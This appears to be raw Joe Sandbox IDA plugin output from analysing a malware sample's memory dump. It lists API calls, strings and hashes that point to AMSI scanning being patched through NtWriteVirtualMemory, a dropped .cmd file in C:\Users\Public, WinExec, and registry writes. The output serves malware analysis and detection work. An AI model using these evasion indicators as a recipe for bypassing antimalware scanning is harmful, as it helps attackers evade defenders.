27e8818 * 3 10937->11140 11141 27ef1d6-27ef223 call 27d4500 call 27d4c60 call 27d4500 call 27d4c60 call 27d4500 10937->11141 11140->11141
                                                                                        APIs
                                                                                          • Part of subcall function 027E889C: LoadLibraryA.KERNEL32(00000000,00000000,027E8983), ref: 027E88D0
                                                                                          • Part of subcall function 027E889C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,027E8983), ref: 027E88E0
                                                                                          • Part of subcall function 027E889C: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 027E88F9
                                                                                          • Part of subcall function 027E889C: FreeLibrary.KERNEL32(74AE0000,00000000,0282B388,Function_0000662C,00000004,0282B398,0282B388,000186A3,00000040,0282B39C,74AE0000,00000000,00000000,00000000,00000000,027E8983), ref: 027E8963
                                                                                          • Part of subcall function 027E8654: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 027E86E0
                                                                                          • Part of subcall function 027E8818: LoadLibraryW.KERNEL32(bcrypt,?,000005FC,00000000,0282B3A4,027EA43F,ScanString,0282B3A4,027EA7F4,ScanBuffer,0282B3A4,027EA7F4,Initialize,0282B3A4,027EA7F4,UacScan), ref: 027E882C
                                                                                          • Part of subcall function 027E8818: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 027E8846
                                                                                          • Part of subcall function 027E8818: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000005FC,00000000,0282B3A4,027EA43F,ScanString,0282B3A4,027EA7F4,ScanBuffer,0282B3A4,027EA7F4,Initialize), ref: 027E8882
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,ScanString,0282B37C,027EF240,OpenSession,0282B37C,027EF240,UacScan,0282B37C,027EF240,ScanBuffer,0282B37C,027EF240,OpenSession,0282B37C), ref: 027EF062
                                                                                        • CloseHandle.KERNEL32(00000000,00000000,000000FF,ScanString,0282B37C,027EF240,OpenSession,0282B37C,027EF240,UacScan,0282B37C,027EF240,ScanBuffer,0282B37C,027EF240,OpenSession), ref: 027EF06A
                                                                                        • CloseHandle.KERNEL32(000008A8,00000000,00000000,000000FF,ScanString,0282B37C,027EF240,OpenSession,0282B37C,027EF240,UacScan,0282B37C,027EF240,ScanBuffer,0282B37C,027EF240), ref: 027EF073
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$Handle$AddressCloseFreeLoadProc$CreateModuleObjectProcessSingleUserWait
                                                                                        • String ID: "C:\Users\Public\UhzauuilF.cmd" $Amsi$AmsiOpenSession$Initialize$NtOpenProcess$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacScan$ntdll
                                                                                        • API String ID: 1374282660-1977161105

                                                                                         Control-flow Graph

                                                                                        APIs
                                                                                        • Sleep.KERNEL32(00000000,?,027D2000), ref: 027D17D0
                                                                                        • Sleep.KERNEL32(0000000A,00000000,?,027D2000), ref: 027D17E6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                         • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: Sleep
                                                                                        • String ID: %@ @
                                                                                        • API String ID: 3472027048-627730658

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • LoadLibraryW.KERNEL32(amsi), ref: 027E878D
                                                                                          • Part of subcall function 027E8140: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027E81C8,?,?,00000000,00000000,?,027E80E1,00000000,KernelBASE,00000000,00000000,027E8108), ref: 027E818D
                                                                                          • Part of subcall function 027E8140: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027E8193
                                                                                          • Part of subcall function 027E8140: GetProcAddress.KERNEL32(?,?), ref: 027E81A5
                                                                                          • Part of subcall function 027E7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 027E7DEC
                                                                                        • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 027E87EC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                         • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                                        • String ID: DllGetClassObject$W$amsi
                                                                                        • API String ID: 941070894-2671292670

                                                                                         Control-flow Graph

                                                                                        APIs
                                                                                        • Sleep.KERNEL32(00000000,?,?,00000000,027D1FE4), ref: 027D1B17
                                                                                        • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,027D1FE4), ref: 027D1B31
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                         • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: Sleep
                                                                                        • String ID:
                                                                                        • API String ID: 3472027048-0

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 027EE8EA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                         • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: CheckConnectionInternet
                                                                                        • String ID: Initialize$OpenSession$ScanBuffer
                                                                                        • API String ID: 3847983778-3852638603
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(00000000,00000000,027E8983), ref: 027E88D0
                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,027E8983), ref: 027E88E0
                                                                                        • GetProcAddress.KERNEL32(74AE0000,00000000), ref: 027E88F9
                                                                                          • Part of subcall function 027E7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 027E7DEC
                                                                                        • FreeLibrary.KERNEL32(74AE0000,00000000,0282B388,Function_0000662C,00000004,0282B398,0282B388,000186A3,00000040,0282B39C,74AE0000,00000000,00000000,00000000,00000000,027E8983), ref: 027E8963
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                         • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$AddressFreeHandleLoadMemoryModuleProcVirtualWrite
                                                                                        • String ID:
                                                                                        • API String ID: 1543721669-0
                                                                                        APIs
                                                                                          • Part of subcall function 027E8098: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027E8108,?,?,00000000,?,027E7A7E,ntdll,00000000,00000000,027E7AC3,?,?,00000000), ref: 027E80D6
                                                                                          • Part of subcall function 027E8098: GetModuleHandleA.KERNELBASE(?), ref: 027E80EA
                                                                                          • Part of subcall function 027E8140: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027E81C8,?,?,00000000,00000000,?,027E80E1,00000000,KernelBASE,00000000,00000000,027E8108), ref: 027E818D
                                                                                          • Part of subcall function 027E8140: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027E8193
                                                                                          • Part of subcall function 027E8140: GetProcAddress.KERNEL32(?,?), ref: 027E81A5
                                                                                        • WinExec.KERNEL32(?,?), ref: 027E84F0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                         • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule$AddressProc$Exec
                                                                                        • String ID: Kernel32$WinExec
                                                                                        • API String ID: 2292790416-3609268280
                                                                                        APIs
                                                                                          • Part of subcall function 027E8098: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027E8108,?,?,00000000,?,027E7A7E,ntdll,00000000,00000000,027E7AC3,?,?,00000000), ref: 027E80D6
                                                                                          • Part of subcall function 027E8098: GetModuleHandleA.KERNELBASE(?), ref: 027E80EA
                                                                                          • Part of subcall function 027E8140: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027E81C8,?,?,00000000,00000000,?,027E80E1,00000000,KernelBASE,00000000,00000000,027E8108), ref: 027E818D
                                                                                          • Part of subcall function 027E8140: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027E8193
                                                                                          • Part of subcall function 027E8140: GetProcAddress.KERNEL32(?,?), ref: 027E81A5
                                                                                        • WinExec.KERNEL32(?,?), ref: 027E84F0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                         • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule$AddressProc$Exec
                                                                                        • String ID: Kernel32$WinExec
                                                                                        • API String ID: 2292790416-3609268280
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,027E5D74,?,?,027E3900,00000001), ref: 027E5C88
                                                                                        • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,027E5D74,?,?,027E3900,00000001), ref: 027E5CB6
                                                                                          • Part of subcall function 027D7D5C: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,027E3900,027E5CF6,00000000,027E5D74,?,?,027E3900), ref: 027D7DAA
                                                                                          • Part of subcall function 027D7F98: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,027E3900,027E5D11,00000000,027E5D74,?,?,027E3900,00000001), ref: 027D7FB7
                                                                                        • GetLastError.KERNEL32(00000000,027E5D74,?,?,027E3900,00000001), ref: 027E5D1B
                                                                                          • Part of subcall function 027DA778: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,027DC3D9,00000000,027DC433), ref: 027DA797
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                        • String ID:
                                                                                        • API String ID: 503785936-0
                                                                                        • Opcode ID: f41e8f47b84f8ad0b3fddcff15fdb994b0f43d599ce0161824cf00d7813c4fb5
                                                                                        • Instruction ID: eef9838cbcbbffcdc8056df974083225f73c9b6ff26a657494f530574c736559
                                                                                        • Opcode Fuzzy Hash: f41e8f47b84f8ad0b3fddcff15fdb994b0f43d599ce0161824cf00d7813c4fb5
                                                                                        • Instruction Fuzzy Hash: 5931D574E006099FDB02EFA9C8897EDB7F6AB0D704F908465D505AB390D7755A048FB1
                                                                                        APIs
                                                                                        • RegOpenKeyA.ADVAPI32(?,00000000,0291FA64), ref: 027EF54C
                                                                                        • RegSetValueExA.ADVAPI32(000008B4,00000000,00000000,00000001,00000000,0000001C,00000000,027EF5B7), ref: 027EF584
                                                                                        • RegCloseKey.ADVAPI32(000008B4,000008B4,00000000,00000000,00000001,00000000,0000001C,00000000,027EF5B7), ref: 027EF58F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpenValue
                                                                                        • String ID:
                                                                                        • API String ID: 779948276-0
                                                                                        • Opcode ID: 4c93381b53a65b0d84769105e3574b8d0ad0b97aac33f8fb4b87282817c3c902
                                                                                        • Instruction ID: 59b7bb6ce2f4f9a339eda1de716c035d30dd90b726f862033d3df35e47f72b8e
                                                                                        • Opcode Fuzzy Hash: 4c93381b53a65b0d84769105e3574b8d0ad0b97aac33f8fb4b87282817c3c902
                                                                                        • Instruction Fuzzy Hash: 53113D71644608AFEB02EF69EC95A697BFDEB08710F400460F505D7A90EB34EA40CF64
                                                                                        APIs
                                                                                        • RegOpenKeyA.ADVAPI32(?,00000000,0291FA64), ref: 027EF54C
                                                                                        • RegSetValueExA.ADVAPI32(000008B4,00000000,00000000,00000001,00000000,0000001C,00000000,027EF5B7), ref: 027EF584
                                                                                        • RegCloseKey.ADVAPI32(000008B4,000008B4,00000000,00000000,00000001,00000000,0000001C,00000000,027EF5B7), ref: 027EF58F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpenValue
                                                                                        • String ID:
                                                                                        • API String ID: 779948276-0
                                                                                        • Opcode ID: a08099b275ca3488788ca50df73634466cb01f742e068beca8a0a1fa3cb7a3e2
                                                                                        • Instruction ID: 11c13fabadf9313474ce19f45823525b40be138f6929e95040b652034cf822fc
                                                                                        • Opcode Fuzzy Hash: a08099b275ca3488788ca50df73634466cb01f742e068beca8a0a1fa3cb7a3e2
                                                                                        • Instruction Fuzzy Hash: 09113A71644608AFEB02EF69EC95A9A7BFDEB08710F800460F505D7A90EB34EA40CF64
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClearVariant
                                                                                        • String ID:
                                                                                        • API String ID: 1473721057-0
                                                                                        • Opcode ID: bdf24b9b4a84d76d6b99f4a02b357de5794f6a0c09f0e70233ac7d7f969ec5a2
                                                                                        • Instruction ID: 47cfb87e6d0f15b1d6fca3d0d0c53ac1814f44973396d0301c405323fdbefd07
                                                                                        • Opcode Fuzzy Hash: bdf24b9b4a84d76d6b99f4a02b357de5794f6a0c09f0e70233ac7d7f969ec5a2
                                                                                        • Instruction Fuzzy Hash: F4F0CD20708210C7CB277B39CD8867D37BA9F40364764583AA446AF202CB64CC45CBA2
                                                                                        APIs
                                                                                        • SysFreeString.OLEAUT32(027EF798), ref: 027D4C6E
                                                                                        • SysAllocStringLen.OLEAUT32(?,?), ref: 027D4D5B
                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 027D4D6D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: String$Free$Alloc
                                                                                        • String ID:
                                                                                        • API String ID: 986138563-0
                                                                                        • Opcode ID: 5dddb5a7acdf1ffc264aed21d51a399118c55e024ce88522a09c9b5f103c8e92
                                                                                        • Instruction ID: 8584caf13daaad371d23b94c4d2d0b1dd1f93098fc8997f599252072b84a6ebd
                                                                                        • Opcode Fuzzy Hash: 5dddb5a7acdf1ffc264aed21d51a399118c55e024ce88522a09c9b5f103c8e92
                                                                                        • Instruction Fuzzy Hash: AFE05BB83062056EFF156F61DD54B37333AAFC3740B548899E804DE164D739E441AD38
                                                                                        APIs
                                                                                        • SysFreeString.OLEAUT32(?), ref: 027E73DA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeString
                                                                                        • String ID: H
                                                                                        • API String ID: 3341692771-2852464175
                                                                                        • Opcode ID: 06bdc41f1454ffd45dd39d1003aeac44b9bc69d46aa42d8b5c5d49cc95c93d33
                                                                                        • Instruction ID: 276470291b01e885ce0dbfc3c1ab8920f723c18603085c018145395a4c1f3b82
                                                                                        • Opcode Fuzzy Hash: 06bdc41f1454ffd45dd39d1003aeac44b9bc69d46aa42d8b5c5d49cc95c93d33
                                                                                        • Instruction Fuzzy Hash: 23B1C074A016089FDB19CF99D880A9DFBF6FF8D314F258169E846AB360D731A845CF60
                                                                                        APIs
                                                                                        • VariantCopy.OLEAUT32(00000000,00000000), ref: 027DE781
                                                                                          • Part of subcall function 027DE364: VariantClear.OLEAUT32(?), ref: 027DE373
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearCopy
                                                                                        • String ID:
                                                                                        • API String ID: 274517740-0
                                                                                        • Opcode ID: 4995d7d3ff3f84f50d300ab90048ea16d304454d4682f39f2b18a37adc97d154
                                                                                        • Instruction ID: 88e2c7e3ebbd2f6d59a98cc16ab1d700559319c6ab7975ffa18d24c7206009b2
                                                                                        • Opcode Fuzzy Hash: 4995d7d3ff3f84f50d300ab90048ea16d304454d4682f39f2b18a37adc97d154
                                                                                        • Instruction Fuzzy Hash: 6211A52070021187C773AF29C9C9A6637FAAF84760B51943AE54BAF219DB30CC40CA62
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitVariant
                                                                                        • String ID:
                                                                                        • API String ID: 1927566239-0
                                                                                        • Opcode ID: 4106ce54f3494c43c6dc2d4394d9a2f02466c29f8fdaffdffc85f1fcd29b705a
                                                                                        • Instruction ID: 422f6cc87450a4659f4656021fdd91258aeee51cceffdc57944fdbff15c8ad03
                                                                                        • Opcode Fuzzy Hash: 4106ce54f3494c43c6dc2d4394d9a2f02466c29f8fdaffdffc85f1fcd29b705a
                                                                                        • Instruction Fuzzy Hash: B5315471600208AFDB12EFA8D888AAE77F9EB0C314F544565F949DB240D734F950CBA1
                                                                                        APIs
                                                                                        • CLSIDFromProgID.OLE32(00000000,?,00000000,027E6DB9,?,?,?,00000000), ref: 027E6D99
                                                                                          • Part of subcall function 027D4C60: SysFreeString.OLEAUT32(027EF798), ref: 027D4C6E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeFromProgString
                                                                                        • String ID:
                                                                                        • API String ID: 4225568880-0
